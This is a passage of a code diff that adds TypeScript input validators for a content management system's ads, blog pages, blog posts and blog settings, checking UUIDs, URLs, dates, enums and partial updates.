+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+export type AdPlacementInput = {
+  placementType: AdPlacementType;
+  targetId: string | null;
+};
+
+/** `targetId` is required for `widget`/`post`/`page`, forbidden (must be absent/null) for `global` — mirrors the schema's own permissive column (nullable) with the actual rule enforced here, same "type gates which reference is meaningful" convention `menu-policy.ts` uses. */
+export function validateAdPlacementInput(
+  body: unknown,
+  index: number
+):
+  | { valid: true; value: AdPlacementInput }
+  | { valid: false; errors: ValidationError[] } {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const prefix = `placements[${index}]`;
+
+  if (!isAdPlacementType(record.placementType)) {
+    errors.push({
+      field: `${prefix}.placementType`,
+      message: `placementType must be one of ${AD_PLACEMENT_TYPES.join(", ")}.`
+    });
+    return { valid: false, errors };
+  }
+
+  if (record.placementType === "global") {
+    if (record.targetId !== undefined && record.targetId !== null) {
+      errors.push({
+        field: `${prefix}.targetId`,
+        message: "targetId must be omitted for a global placement."
+      });
+    }
+  } else if (
+    typeof record.targetId !== "string" ||
+    !UUID_PATTERN.test(record.targetId)
+  ) {
+    errors.push({
+      field: `${prefix}.targetId`,
+      message: `targetId is required and must be a UUID for a ${record.placementType} placement.`
+    });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      placementType: record.placementType,
+      targetId:
+        record.placementType === "global" ? null : (record.targetId as string)
+    }
+  };
+}
+
+export function validateAdPlacementsInput(
+  body: unknown
+):
+  | { valid: true; value: AdPlacementInput[] }
+  | { valid: false; errors: ValidationError[] } {
+  if (!Array.isArray(body)) {
+    return {
+      valid: false,
+      errors: [{ field: "placements", message: "placements must be an array." }]
+    };
+  }
+
+  const errors: ValidationError[] = [];
+  const placements: AdPlacementInput[] = [];
+
+  body.forEach((item, index) => {
+    const result = validateAdPlacementInput(item, index);
+
+    if (!result.valid) {
+      errors.push(...result.errors);
+    } else {
+      placements.push(result.value);
+    }
+  });
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value: placements };
+}
+
+export type CreateAdInput = {
+  name: string;
+  imageUrl: string;
+  linkUrl: string | null;
+  isActive: boolean;
+  startsAt: Date | null;
+  endsAt: Date | null;
+};
+
+export type CreateAdValidationResult =
+  | { valid: true; value: CreateAdInput }
+  | { valid: false; errors: ValidationError[] };
+
+function parseOptionalDate(
+  value: unknown,
+  field: string,
+  errors: ValidationError[]
+): Date | null {
+  if (value === undefined || value === null) {
+    return null;
+  }
+
+  if (typeof value !== "string") {
+    errors.push({
+      field,
+      message: `${field} must be an ISO 8601 datetime string.`
+    });
+    return null;
+  }
+
+  const parsed = new Date(value);
+
+  if (Number.isNaN(parsed.getTime())) {
+    errors.push({
+      field,
+      message: `${field} must be a valid ISO 8601 datetime.`
+    });
+    return null;
+  }
+
+  return parsed;
+}
+
+export function validateCreateAdInput(body: unknown): CreateAdValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+
+  if (!isNonEmptyString(record.name)) {
+    errors.push({ field: "name", message: "name is required." });
+  }
+
+  if (
+    !isNonEmptyString(record.imageUrl) ||
+    !isAbsoluteHttpUrl(record.imageUrl)
+  ) {
+    errors.push({
+      field: "imageUrl",
+      message: "imageUrl is required and must be an absolute http(s) URL."
+    });
+  }
+
+  let linkUrl: string | null = null;
+
+  if (record.linkUrl !== undefined && record.linkUrl !== null) {
+    if (
+      typeof record.linkUrl !== "string" ||
+      !isAbsoluteHttpUrl(record.linkUrl)
+    ) {
+      errors.push({
+        field: "linkUrl",
+        message: "linkUrl must be an absolute http(s) URL when provided."
+      });
+    } else {
+      linkUrl = record.linkUrl;
+    }
+  }
+
+  const startsAt = parseOptionalDate(record.startsAt, "startsAt", errors);
+  const endsAt = parseOptionalDate(record.endsAt, "endsAt", errors);
+
+  if (startsAt && endsAt && endsAt <= startsAt) {
+    errors.push({ field: "endsAt", message: "endsAt must be after startsAt." });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      name: (record.name as string).trim(),
+      imageUrl: record.imageUrl as string,
+      linkUrl,
+      isActive: record.isActive !== false,
+      startsAt,
+      endsAt
+    }
+  };
+}
+
+export type UpdateAdInput = {
+  name?: string;
+  imageUrl?: string;
+  linkUrl?: string | null;
+  isActive?: boolean;
+  startsAt?: Date | null;
+  endsAt?: Date | null;
+};
+
+export type UpdateAdValidationResult =
+  | { valid: true; value: UpdateAdInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateUpdateAdInput(body: unknown): UpdateAdValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const value: UpdateAdInput = {};
+
+  if (record.name !== undefined) {
+    if (!isNonEmptyString(record.name)) {
+      errors.push({
+        field: "name",
+        message: "name must be a non-empty string."
+      });
+    } else {
+      value.name = record.name.trim();
+    }
+  }
+
+  if (record.imageUrl !== undefined) {
+    if (
+      typeof record.imageUrl !== "string" ||
+      !isAbsoluteHttpUrl(record.imageUrl)
+    ) {
+      errors.push({
+        field: "imageUrl",
+        message: "imageUrl must be an absolute http(s) URL."
+      });
+    } else {
+      value.imageUrl = record.imageUrl;
+    }
+  }
+
+  if (record.linkUrl !== undefined) {
+    if (record.linkUrl === null) {
+      value.linkUrl = null;
+    } else if (
+      typeof record.linkUrl !== "string" ||
+      !isAbsoluteHttpUrl(record.linkUrl)
+    ) {
+      errors.push({
+        field: "linkUrl",
+        message: "linkUrl must be an absolute http(s) URL when provided."
+      });
+    } else {
+      value.linkUrl = record.linkUrl;
+    }
+  }
+
+  if (record.isActive !== undefined) {
+    if (typeof record.isActive !== "boolean") {
+      errors.push({
+        field: "isActive",
+        message: "isActive must be a boolean."
+      });
+    } else {
+      value.isActive = record.isActive;
+    }
+  }
+
+  if (record.startsAt !== undefined) {
+    value.startsAt = parseOptionalDate(record.startsAt, "startsAt", errors);
+  }
+
+  if (record.endsAt !== undefined) {
+    value.endsAt = parseOptionalDate(record.endsAt, "endsAt", errors);
+  }
+
+  if (value.startsAt && value.endsAt && value.endsAt <= value.startsAt) {
+    errors.push({ field: "endsAt", message: "endsAt must be after startsAt." });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/blog-content/domain/blog-page-validation.ts
+++ b/src/modules/blog-content/domain/blog-page-validation.ts
@@ -1,0 +1,371 @@
+import {
+  validateBlogContentCore,
+  validateContentJsonField,
+  validateContentTextField,
+  validateDeleteReasonInput,
+  validateExcerptField,
+  validateLocaleField,
+  validateSlugField,
+  validateTitleField,
+  type DeleteReasonInput
+} from "./content-validation";
+import { validateSeoFields } from "./seo-validation";
+import {
+  isBlogContentVisibility,
+  type BlogContentVisibility
+} from "./post-status";
+import { isPageType, type PageType } from "./page-type";
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+function validateFeaturedMediaId(
+  value: unknown
+): { valid: true; value: string | null } | { valid: false } {
+  if (value === undefined || value === null) {
+    return { valid: true, value: null };
+  }
+
+  if (typeof value !== "string" || !UUID_PATTERN.test(value)) {
+    return { valid: false };
+  }
+
+  return { valid: true, value };
+}
+
+function validateParentPageId(
+  value: unknown,
+  pageId: string | null
+): { valid: true; value: string | null } | { valid: false; message: string } {
+  if (value === undefined || value === null) {
+    return { valid: true, value: null };
+  }
+
+  if (typeof value !== "string" || !UUID_PATTERN.test(value)) {
+    return { valid: false, message: "parentPageId must be a UUID or null." };
+  }
+
+  if (pageId !== null && value === pageId) {
+    return { valid: false, message: "A page cannot be its own parent." };
+  }
+
+  return { valid: true, value };
+}
+
+function validateMenuOrder(
+  value: unknown
+): { valid: true; value: number } | { valid: false } {
+  if (value === undefined) {
+    return { valid: true, value: 0 };
+  }
+
+  if (typeof value !== "number" || !Number.isInteger(value) || value < 0) {
+    return { valid: false };
+  }
+
+  return { valid: true, value };
+}
+
+export type CreateBlogPageInput = {
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  locale: string;
+  visibility: BlogContentVisibility;
+  featuredMediaId: string | null;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+  pageType: PageType;
+  parentPageId: string | null;
+  menuOrder: number;
+};
+
+export type CreateBlogPageValidationResult =
+  | { valid: true; value: CreateBlogPageInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `POST /api/v1/blog/pages` (Issue #539). Same core/SEO composition as `validateCreateBlogPostInput`, plus page-only fields (`pageType`, `parentPageId`, `menuOrder`, doc issue #539 §Data Rules — Pages). */
+export function validateCreateBlogPageInput(
+  body: unknown
+): CreateBlogPageValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+
+  const coreResult = validateBlogContentCore(record);
+  if (!coreResult.valid) {
+    errors.push(...coreResult.errors);
+  }
+
+  const seoResult = validateSeoFields(record);
+  if (!seoResult.valid) {
+    errors.push(...seoResult.errors);
+  }
+
+  let visibility: BlogContentVisibility = "public";
+  if (record.visibility !== undefined) {
+    if (!isBlogContentVisibility(record.visibility)) {
+      errors.push({
+        field: "visibility",
+        message: "visibility must be one of public, private, unlisted."
+      });
+    } else {
+      visibility = record.visibility;
+    }
+  }
+
+  const featuredMediaIdResult = validateFeaturedMediaId(record.featuredMediaId);
+  if (!featuredMediaIdResult.valid) {
+    errors.push({
+      field: "featuredMediaId",
+      message: "featuredMediaId must be a UUID when provided."
+    });
+  }
+
+  let pageType: PageType = "standard";
+  if (record.pageType !== undefined) {
+    if (!isPageType(record.pageType)) {
+      errors.push({
+        field: "pageType",
+        message: "pageType must be one of standard, landing, legal, system."
+      });
+    } else {
+      pageType = record.pageType;
+    }
+  }
+
+  const parentPageIdResult = validateParentPageId(record.parentPageId, null);
+  if (!parentPageIdResult.valid) {
+    errors.push({ field: "parentPageId", message: parentPageIdResult.message });
+  }
+
+  const menuOrderResult = validateMenuOrder(record.menuOrder);
+  if (!menuOrderResult.valid) {
+    errors.push({
+      field: "menuOrder",
+      message: "menuOrder must be a non-negative integer."
+    });
+  }
+
+  if (
+    errors.length > 0 ||
+    !coreResult.valid ||
+    !seoResult.valid ||
+    !featuredMediaIdResult.valid ||
+    !parentPageIdResult.valid ||
+    !menuOrderResult.valid
+  ) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      ...coreResult.value,
+      visibility,
+      featuredMediaId: featuredMediaIdResult.value,
+      seoTitle: seoResult.value.seoTitle ?? null,
+      metaDescription: seoResult.value.metaDescription ?? null,
+      canonicalUrl: seoResult.value.canonicalUrl ?? null,
+      pageType,
+      parentPageId: parentPageIdResult.value,
+      menuOrder: menuOrderResult.value
+    }
+  };
+}
+
+export type UpdateBlogPageInput = {
+  title?: string;
+  slug?: string;
+  excerpt?: string | null;
+  contentJson?: Record<string, unknown>;
+  contentText?: string;
+  locale?: string;
+  visibility?: BlogContentVisibility;
+  featuredMediaId?: string | null;
+  seoTitle?: string | null;
+  metaDescription?: string | null;
+  canonicalUrl?: string | null;
+  pageType?: PageType;
+  parentPageId?: string | null;
+  menuOrder?: number;
+};
+
+export type UpdateBlogPageValidationResult =
+  | { valid: true; value: UpdateBlogPageInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `PATCH /api/v1/blog/pages/{id}` (Issue #539). Only fields present in the body are validated/copied — same partial-update shape as `validateUpdateBlogPostInput`. */
+export function validateUpdateBlogPageInput(
+  body: unknown,
+  pageId: string
+): UpdateBlogPageValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+  const value: UpdateBlogPageInput = {};
+
+  if (record.title !== undefined) {
+    const error = validateTitleField(record.title);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.title = (record.title as string).trim();
+    }
+  }
+
+  if (record.slug !== undefined) {
+    const error = validateSlugField(record.slug);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.slug = (record.slug as string).trim();
+    }
+  }
+
+  if (record.excerpt !== undefined) {
+    const error = validateExcerptField(record.excerpt);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.excerpt =
+        record.excerpt === null ? null : (record.excerpt as string).trim();
+    }
+  }
+
+  if (record.contentJson !== undefined) {
+    const error = validateContentJsonField(record.contentJson);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.contentJson = record.contentJson as Record<string, unknown>;
+    }
+  }
+
+  if (record.contentText !== undefined) {
+    const error = validateContentTextField(record.contentText);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.contentText = record.contentText as string;
+    }
+  }
+
+  if (record.locale !== undefined) {
+    const error = validateLocaleField(record.locale);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.locale = (record.locale as string).trim();
+    }
+  }
+
+  if (record.visibility !== undefined) {
+    if (!isBlogContentVisibility(record.visibility)) {
+      errors.push({
+        field: "visibility",
+        message: "visibility must be one of public, private, unlisted."
+      });
+    } else {
+      value.visibility = record.visibility;
+    }
+  }
+
+  if (record.featuredMediaId !== undefined) {
+    const featuredMediaIdResult = validateFeaturedMediaId(
+      record.featuredMediaId
+    );
+    if (!featuredMediaIdResult.valid) {
+      errors.push({
+        field: "featuredMediaId",
+        message: "featuredMediaId must be a UUID or null."
+      });
+    } else {
+      value.featuredMediaId = featuredMediaIdResult.value;
+    }
+  }
+
+  if (record.pageType !== undefined) {
+    if (!isPageType(record.pageType)) {
+      errors.push({
+        field: "pageType",
+        message: "pageType must be one of standard, landing, legal, system."
+      });
+    } else {
+      value.pageType = record.pageType;
+    }
+  }
+
+  if (record.parentPageId !== undefined) {
+    const parentPageIdResult = validateParentPageId(
+      record.parentPageId,
+      pageId
+    );
+    if (!parentPageIdResult.valid) {
+      errors.push({
+        field: "parentPageId",
+        message: parentPageIdResult.message
+      });
+    } else {
+      value.parentPageId = parentPageIdResult.value;
+    }
+  }
+
+  if (record.menuOrder !== undefined) {
+    const menuOrderResult = validateMenuOrder(record.menuOrder);
+    if (!menuOrderResult.valid) {
+      errors.push({
+        field: "menuOrder",
+        message: "menuOrder must be a non-negative integer."
+      });
+    } else {
+      value.menuOrder = menuOrderResult.value;
+    }
+  }
+
+  if (
+    record.seoTitle !== undefined ||
+    record.metaDescription !== undefined ||
+    record.canonicalUrl !== undefined
+  ) {
+    const seoResult = validateSeoFields(record);
+    if (!seoResult.valid) {
+      errors.push(...seoResult.errors);
+    } else {
+      if (record.seoTitle !== undefined) {
+        value.seoTitle = seoResult.value.seoTitle ?? null;
+      }
+      if (record.metaDescription !== undefined) {
+        value.metaDescription = seoResult.value.metaDescription ?? null;
+      }
+      if (record.canonicalUrl !== undefined) {
+        value.canonicalUrl = seoResult.value.canonicalUrl ?? null;
+      }
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}
+
+export type SoftDeleteBlogPageInput = DeleteReasonInput;
+
+export type SoftDeleteBlogPageValidationResult =
+  | { valid: true; value: SoftDeleteBlogPageInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `DELETE /api/v1/blog/pages/{id}` body: `{ reason: string }`. */
+export function validateSoftDeleteBlogPageInput(
+  body: unknown
+): SoftDeleteBlogPageValidationResult {
+  return validateDeleteReasonInput(body);
+}

--- a/src/modules/blog-content/domain/blog-post-validation.ts
+++ b/src/modules/blog-content/domain/blog-post-validation.ts
@@ -1,0 +1,452 @@
+import {
+  validateBlogContentCore,
+  validateContentJsonField,
+  validateContentTextField,
+  validateDeleteReasonInput,
+  validateExcerptField,
+  validateLocaleField,
+  validateSlugField,
+  validateTitleField,
+  type DeleteReasonInput
+} from "./content-validation";
+import { validateSeoFields } from "./seo-validation";
+import {
+  isBlogContentVisibility,
+  type BlogContentVisibility
+} from "./post-status";
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+export type CreateBlogPostInput = {
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  locale: string;
+  visibility: BlogContentVisibility;
+  featuredMediaId: string | null;
+  /** Issue #649 — explicit "use this image for social/SEO preview" override; same shape as `featuredMediaId` (UUID-or-null, no existence check here — that is `news-media-reference-gate.ts`'s job in full-online R2-only mode). Takes priority over `featuredMediaId` at render time (`social-preview-image-resolution.ts`). */
+  seoImageMediaId: string | null;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+  termIds: string[] | undefined;
+  translationGroupId: string | null;
+  /** Issue #641 — manual per-post opt-out of automatic internal tag linking. Defaults `false` (linking behaves exactly as before this issue unless an editor explicitly opts a post out). */
+  autoInternalTagLinksDisabled: boolean;
+};
+
+export type CreateBlogPostValidationResult =
+  | { valid: true; value: CreateBlogPostInput }
+  | { valid: false; errors: ValidationError[] };
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+function validateFeaturedMediaId(
+  value: unknown
+): { valid: true; value: string | null } | { valid: false } {
+  if (value === undefined || value === null) {
+    return { valid: true, value: null };
+  }
+
+  if (typeof value !== "string" || !UUID_PATTERN.test(value)) {
+    return { valid: false };
+  }
+
+  return { valid: true, value };
+}
+
+/**
+ * `translationGroupId` (Issue #542 §Multilingual Content) — an optional
+ * UUID linking this post to its translation siblings; same shape/rule as
+ * `featuredMediaId` above (optional, UUID-or-null, no existence check here
+ * — that's `application/localized-content-directory.ts`'s job).
+ */
+function validateTranslationGroupId(
+  value: unknown
+): { valid: true; value: string | null } | { valid: false } {
+  return validateFeaturedMediaId(value);
+}
+
+/**
+ * `termIds` (doc issue #539 §Scope: "Post-term relation handling") —
+ * validated here purely for shape (array of UUIDs); existence within the
+ * caller's tenant is checked at the application layer
+ * (`countExistingTerms`) since that requires a database round-trip a pure
+ * validator cannot do.
+ */
+function validateTermIds(
+  value: unknown
+): { valid: true; value: string[] | undefined } | { valid: false } {
+  if (value === undefined) {
+    return { valid: true, value: undefined };
+  }
+
+  if (
+    !Array.isArray(value) ||
+    !value.every((item) => typeof item === "string" && UUID_PATTERN.test(item))
+  ) {
+    return { valid: false };
+  }
+
+  return { valid: true, value: [...new Set(value as string[])] };
+}
+
+/** `POST /api/v1/blog/posts` (Issue #538). Composes the shared core/SEO validators from Issue #537 plus post-only fields (`visibility`, `featuredMediaId`). */
+export function validateCreateBlogPostInput(
+  body: unknown
+): CreateBlogPostValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+
+  const coreResult = validateBlogContentCore(record);
+  if (!coreResult.valid) {
+    errors.push(...coreResult.errors);
+  }
+
+  const seoResult = validateSeoFields(record);
+  if (!seoResult.valid) {
+    errors.push(...seoResult.errors);
+  }
+
+  let visibility: BlogContentVisibility = "public";
+  if (record.visibility !== undefined) {
+    if (!isBlogContentVisibility(record.visibility)) {
+      errors.push({
+        field: "visibility",
+        message: "visibility must be one of public, private, unlisted."
+      });
+    } else {
+      visibility = record.visibility;
+    }
+  }
+
+  const featuredMediaIdResult = validateFeaturedMediaId(record.featuredMediaId);
+  if (!featuredMediaIdResult.valid) {
+    errors.push({
+      field: "featuredMediaId",
+      message: "featuredMediaId must be a UUID when provided."
+    });
+  }
+
+  const seoImageMediaIdResult = validateFeaturedMediaId(record.seoImageMediaId);
+  if (!seoImageMediaIdResult.valid) {
+    errors.push({
+      field: "seoImageMediaId",
+      message: "seoImageMediaId must be a UUID when provided."
+    });
+  }
+
+  const termIdsResult = validateTermIds(record.termIds);
+  if (!termIdsResult.valid) {
+    errors.push({
+      field: "termIds",
+      message: "termIds must be an array of UUIDs when provided."
+    });
+  }
+
+  const translationGroupIdResult = validateTranslationGroupId(
+    record.translationGroupId
+  );
+  if (!translationGroupIdResult.valid) {
+    errors.push({
+      field: "translationGroupId",
+      message: "translationGroupId must be a UUID when provided."
+    });
+  }
+
+  let autoInternalTagLinksDisabled = false;
+  if (record.autoInternalTagLinksDisabled !== undefined) {
+    if (typeof record.autoInternalTagLinksDisabled !== "boolean") {
+      errors.push({
+        field: "autoInternalTagLinksDisabled",
+        message: "autoInternalTagLinksDisabled must be a boolean."
+      });
+    } else {
+      autoInternalTagLinksDisabled = record.autoInternalTagLinksDisabled;
+    }
+  }
+
+  if (
+    errors.length > 0 ||
+    !coreResult.valid ||
+    !seoResult.valid ||
+    !featuredMediaIdResult.valid ||
+    !seoImageMediaIdResult.valid ||
+    !termIdsResult.valid ||
+    !translationGroupIdResult.valid
+  ) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      ...coreResult.value,
+      visibility,
+      featuredMediaId: featuredMediaIdResult.value,
+      seoImageMediaId: seoImageMediaIdResult.value,
+      seoTitle: seoResult.value.seoTitle ?? null,
+      metaDescription: seoResult.value.metaDescription ?? null,
+      canonicalUrl: seoResult.value.canonicalUrl ?? null,
+      termIds: termIdsResult.value,
+      translationGroupId: translationGroupIdResult.value,
+      autoInternalTagLinksDisabled
+    }
+  };
+}
+
+export type UpdateBlogPostInput = {
+  title?: string;
+  slug?: string;
+  excerpt?: string | null;
+  contentJson?: Record<string, unknown>;
+  contentText?: string;
+  locale?: string;
+  visibility?: BlogContentVisibility;
+  featuredMediaId?: string | null;
+  seoImageMediaId?: string | null;
+  seoTitle?: string | null;
+  metaDescription?: string | null;
+  canonicalUrl?: string | null;
+  termIds?: string[];
+  translationGroupId?: string | null;
+  /** Issue #641 — manual per-post opt-out of automatic internal tag linking. */
+  autoInternalTagLinksDisabled?: boolean;
+};
+
+export type UpdateBlogPostValidationResult =
+  | { valid: true; value: UpdateBlogPostInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `PATCH /api/v1/blog/posts/{id}` (Issue #538). Only the fields actually present in the body are validated/copied — each reuses the same field-level validator `validateBlogContentCore` composes for create, so update and create can never silently drift apart on what counts as a valid slug/contentJson/etc. */
+export function validateUpdateBlogPostInput(
+  body: unknown
+): UpdateBlogPostValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+  const value: UpdateBlogPostInput = {};
+
+  if (record.title !== undefined) {
+    const error = validateTitleField(record.title);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.title = (record.title as string).trim();
+    }
+  }
+
+  if (record.slug !== undefined) {
+    const error = validateSlugField(record.slug);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.slug = (record.slug as string).trim();
+    }
+  }
+
+  if (record.excerpt !== undefined) {
+    const error = validateExcerptField(record.excerpt);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.excerpt =
+        record.excerpt === null ? null : (record.excerpt as string).trim();
+    }
+  }
+
+  if (record.contentJson !== undefined) {
+    const error = validateContentJsonField(record.contentJson);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.contentJson = record.contentJson as Record<string, unknown>;
+    }
+  }
+
+  if (record.contentText !== undefined) {
+    const error = validateContentTextField(record.contentText);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.contentText = record.contentText as string;
+    }
+  }
+
+  if (record.locale !== undefined) {
+    const error = validateLocaleField(record.locale);
+    if (error) {
+      errors.push(error);
+    } else {
+      value.locale = (record.locale as string).trim();
+    }
+  }
+
+  if (record.visibility !== undefined) {
+    if (!isBlogContentVisibility(record.visibility)) {
+      errors.push({
+        field: "visibility",
+        message: "visibility must be one of public, private, unlisted."
+      });
+    } else {
+      value.visibility = record.visibility;
+    }
+  }
+
+  if (record.featuredMediaId !== undefined) {
+    const featuredMediaIdResult = validateFeaturedMediaId(
+      record.featuredMediaId
+    );
+    if (!featuredMediaIdResult.valid) {
+      errors.push({
+        field: "featuredMediaId",
+        message: "featuredMediaId must be a UUID or null."
+      });
+    } else {
+      value.featuredMediaId = featuredMediaIdResult.value;
+    }
+  }
+
+  if (record.seoImageMediaId !== undefined) {
+    const seoImageMediaIdResult = validateFeaturedMediaId(
+      record.seoImageMediaId
+    );
+    if (!seoImageMediaIdResult.valid) {
+      errors.push({
+        field: "seoImageMediaId",
+        message: "seoImageMediaId must be a UUID or null."
+      });
+    } else {
+      value.seoImageMediaId = seoImageMediaIdResult.value;
+    }
+  }
+
+  if (
+    record.seoTitle !== undefined ||
+    record.metaDescription !== undefined ||
+    record.canonicalUrl !== undefined
+  ) {
+    const seoResult = validateSeoFields(record);
+    if (!seoResult.valid) {
+      errors.push(...seoResult.errors);
+    } else {
+      if (record.seoTitle !== undefined) {
+        value.seoTitle = seoResult.value.seoTitle ?? null;
+      }
+      if (record.metaDescription !== undefined) {
+        value.metaDescription = seoResult.value.metaDescription ?? null;
+      }
+      if (record.canonicalUrl !== undefined) {
+        value.canonicalUrl = seoResult.value.canonicalUrl ?? null;
+      }
+    }
+  }
+
+  if (record.termIds !== undefined) {
+    const termIdsResult = validateTermIds(record.termIds);
+    if (!termIdsResult.valid) {
+      errors.push({
+        field: "termIds",
+        message: "termIds must be an array of UUIDs when provided."
+      });
+    } else {
+      value.termIds = termIdsResult.value;
+    }
+  }
+
+  if (record.translationGroupId !== undefined) {
+    const translationGroupIdResult = validateTranslationGroupId(
+      record.translationGroupId
+    );
+    if (!translationGroupIdResult.valid) {
+      errors.push({
+        field: "translationGroupId",
+        message: "translationGroupId must be a UUID or null."
+      });
+    } else {
+      value.translationGroupId = translationGroupIdResult.value;
+    }
+  }
+
+  if (record.autoInternalTagLinksDisabled !== undefined) {
+    if (typeof record.autoInternalTagLinksDisabled !== "boolean") {
+      errors.push({
+        field: "autoInternalTagLinksDisabled",
+        message: "autoInternalTagLinksDisabled must be a boolean."
+      });
+    } else {
+      value.autoInternalTagLinksDisabled = record.autoInternalTagLinksDisabled;
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}
+
+export type ScheduleBlogPostInput = {
+  scheduledAt: Date;
+};
+
+export type ScheduleBlogPostValidationResult =
+  | { valid: true; value: ScheduleBlogPostInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `POST /api/v1/blog/posts/{id}/schedule` body: `{ scheduledAt: <ISO 8601 datetime> }`, must be in the future. */
+export function validateScheduleBlogPostInput(
+  body: unknown
+): ScheduleBlogPostValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+
+  if (typeof record.scheduledAt !== "string") {
+    return {
+      valid: false,
+      errors: [{ field: "scheduledAt", message: "scheduledAt is required." }]
+    };
+  }
+
+  const scheduledAt = new Date(record.scheduledAt);
+
+  if (Number.isNaN(scheduledAt.getTime())) {
+    return {
+      valid: false,
+      errors: [
+        {
+          field: "scheduledAt",
+          message: "scheduledAt must be a valid ISO 8601 datetime."
+        }
+      ]
+    };
+  }
+
+  if (scheduledAt.getTime() <= Date.now()) {
+    return {
+      valid: false,
+      errors: [
+        { field: "scheduledAt", message: "scheduledAt must be in the future." }
+      ]
+    };
+  }
+
+  return { valid: true, value: { scheduledAt } };
+}
+
+export type SoftDeleteBlogPostInput = DeleteReasonInput;
+
+export type SoftDeleteBlogPostValidationResult =
+  | { valid: true; value: SoftDeleteBlogPostInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `DELETE /api/v1/blog/posts/{id}` body: `{ reason: string }` — same required-reason convention as `DELETE /api/v1/profiles/{id}` and `DELETE /api/v1/email/templates/{id}`. Thin wrapper over the shared `validateDeleteReasonInput` (Issue #539 reuses it directly for pages/terms instead of duplicating this). */
+export function validateSoftDeleteBlogPostInput(
+  body: unknown
+): SoftDeleteBlogPostValidationResult {
+  return validateDeleteReasonInput(body);
+}

--- a/src/modules/blog-content/domain/blog-settings-policy.ts
+++ b/src/modules/blog-content/domain/blog-settings-policy.ts
@@ -1,0 +1,328 @@
+/**
+ * `PATCH /api/v1/blog/settings` validator (Issue #543 §Settings Page).
+ * `awcms_blog_settings` (migration 026, Issue #537) already has typed
+ * columns for `default_locale`/`default_visibility`/`posts_per_page`/
+ * `seo_default_title`/`seo_default_description` — this issue is the first
+ * to actually read/write them through an admin route. `blogTitle`,
+ * `blogDescription`, `rssEnabled`, and `sitemapEnabled` have no dedicated
+ * column (out of this issue's scope to add one — the table's existing
+ * catch-all `settings jsonb` column is exactly for this), so they live
+ * under that column instead. Partial-update shape, same convention as
+ * `validateUpdateBlogPostInput`: only fields present in the body are
+ * validated/copied.
+ */
+import { validateLocaleField } from "./content-validation";
+import {
+  isBlogContentVisibility,
+  type BlogContentVisibility
+} from "./post-status";
+import {
+  isOverridableChecklistRuleId,
+  isValidChecklistSeverity,
+  type ChecklistPolicyOverrides
+} from "./content-quality-checklist";
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const MAX_BLOG_TITLE_LENGTH = 200;
+const MAX_BLOG_DESCRIPTION_LENGTH = 500;
+const MAX_SEO_TITLE_LENGTH = 200;
+const MAX_SEO_DESCRIPTION_LENGTH = 300;
+const MIN_POSTS_PER_PAGE = 1;
+const MAX_POSTS_PER_PAGE = 100;
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+export type UpdateBlogSettingsInput = {
+  blogTitle?: string;
+  blogDescription?: string | null;
+  postsPerPage?: number;
+  rssEnabled?: boolean;
+  sitemapEnabled?: boolean;
+  defaultLocale?: string;
+  defaultVisibility?: BlogContentVisibility;
+  seoDefaultTitle?: string | null;
+  seoDefaultDescription?: string | null;
